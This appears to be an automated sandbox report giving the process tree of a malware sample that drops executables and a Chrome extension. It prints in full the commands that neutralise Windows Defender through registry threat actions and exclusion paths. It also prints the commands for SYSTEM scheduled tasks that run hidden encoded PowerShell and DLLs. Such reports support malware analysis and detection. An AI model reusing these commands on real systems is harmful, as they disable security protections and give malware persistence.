C:\Users\Admin\AppData\Local\Temp\IoDYrcSNLocpvVnFK\EKwtKDZvYGGovvt\pvrsggI.exeC:\Users\Admin\AppData\Local\Temp\IoDYrcSNLocpvVnFK\EKwtKDZvYGGovvt\pvrsggI.exe SL /ofsite_idcRH 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3520
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4212
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2600
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MyWyEVaGyEwOczZklbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MyWyEVaGyEwOczZklbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cnKtfofVELLNC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cnKtfofVELLNC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mBUaPyDkTUtU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mBUaPyDkTUtU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vPdYXglKjKUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vPdYXglKjKUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xaXHhbBRU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xaXHhbBRU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ihUYOsbkXmStDhVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ihUYOsbkXmStDhVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IoDYrcSNLocpvVnFK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IoDYrcSNLocpvVnFK\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nHkJQUniIMPgfrVz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nHkJQUniIMPgfrVz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MyWyEVaGyEwOczZklbR" /t REG_DWORD /d 0 /reg:323⤵PID:440
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MyWyEVaGyEwOczZklbR" /t REG_DWORD /d 0 /reg:324⤵PID:4164
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MyWyEVaGyEwOczZklbR" /t REG_DWORD /d 0 /reg:643⤵PID:4288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cnKtfofVELLNC" /t REG_DWORD /d 0 /reg:323⤵PID:4324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cnKtfofVELLNC" /t REG_DWORD /d 0 /reg:643⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mBUaPyDkTUtU2" /t REG_DWORD /d 0 /reg:323⤵PID:4556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mBUaPyDkTUtU2" /t REG_DWORD /d 0 /reg:643⤵PID:3028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vPdYXglKjKUn" /t REG_DWORD /d 0 /reg:323⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vPdYXglKjKUn" /t REG_DWORD /d 0 /reg:643⤵PID:4892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xaXHhbBRU" /t REG_DWORD /d 0 /reg:323⤵PID:1276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xaXHhbBRU" /t REG_DWORD /d 0 /reg:643⤵PID:1380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ihUYOsbkXmStDhVB /t REG_DWORD /d 0 /reg:323⤵PID:5004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ihUYOsbkXmStDhVB /t REG_DWORD /d 0 /reg:643⤵PID:3240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IoDYrcSNLocpvVnFK /t REG_DWORD /d 0 /reg:323⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IoDYrcSNLocpvVnFK /t REG_DWORD /d 0 /reg:643⤵PID:1624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nHkJQUniIMPgfrVz /t REG_DWORD /d 0 /reg:323⤵PID:1036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nHkJQUniIMPgfrVz /t REG_DWORD /d 0 /reg:643⤵PID:1756
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpWCTrlPn" /SC once /ST 00:54:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpWCTrlPn"2⤵PID:5100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpWCTrlPn"2⤵PID:4528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YdWhrynxKGQiTdtBc" /SC once /ST 02:33:32 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nHkJQUniIMPgfrVz\NFFFyMVBrphOVFo\VfePcDC.exe\" og /Eosite_idxGh 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YdWhrynxKGQiTdtBc"2⤵PID:4440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2052
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:4676
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4736
-
C:\Windows\Temp\nHkJQUniIMPgfrVz\NFFFyMVBrphOVFo\VfePcDC.exeC:\Windows\Temp\nHkJQUniIMPgfrVz\NFFFyMVBrphOVFo\VfePcDC.exe og /Eosite_idxGh 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2464 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "byVqvYMHXaoMZDRgRv"2⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1212
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3440
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4212
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\xaXHhbBRU\DCbzlh.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NmaEDVxnjLfXRnq" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NmaEDVxnjLfXRnq2" /F /xml "C:\Program Files (x86)\xaXHhbBRU\zCJKZwA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NmaEDVxnjLfXRnq"2⤵PID:3428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NmaEDVxnjLfXRnq"2⤵PID:2888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hqgMwoyDSsIoWX" /F /xml "C:\Program Files (x86)\mBUaPyDkTUtU2\yReoryo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2332
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RZYQSfteLooPz2" /F /xml "C:\ProgramData\ihUYOsbkXmStDhVB\UNXRcMA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ouYyMlgHVVVhUNspw2" /F /xml "C:\Program Files (x86)\MyWyEVaGyEwOczZklbR\lPtaXql.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "akaEizNpwrKtYZfeYHH2" /F /xml "C:\Program Files (x86)\cnKtfofVELLNC\CsBrHOG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fORmCKMRpgzCRPXvW" /SC once /ST 03:05:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nHkJQUniIMPgfrVz\QorEqhDQ\KohACrS.dll\",#1 /tSsite_idnNM 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fORmCKMRpgzCRPXvW"2⤵PID:64
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4212
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:5056
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1116
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YdWhrynxKGQiTdtBc"2⤵PID:2536
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\nHkJQUniIMPgfrVz\QorEqhDQ\KohACrS.dll",#1 /tSsite_idnNM 5254031⤵PID:3880
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\nHkJQUniIMPgfrVz\QorEqhDQ\KohACrS.dll",#1 /tSsite_idnNM 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1164 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "fORmCKMRpgzCRPXvW"3⤵PID:3532
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
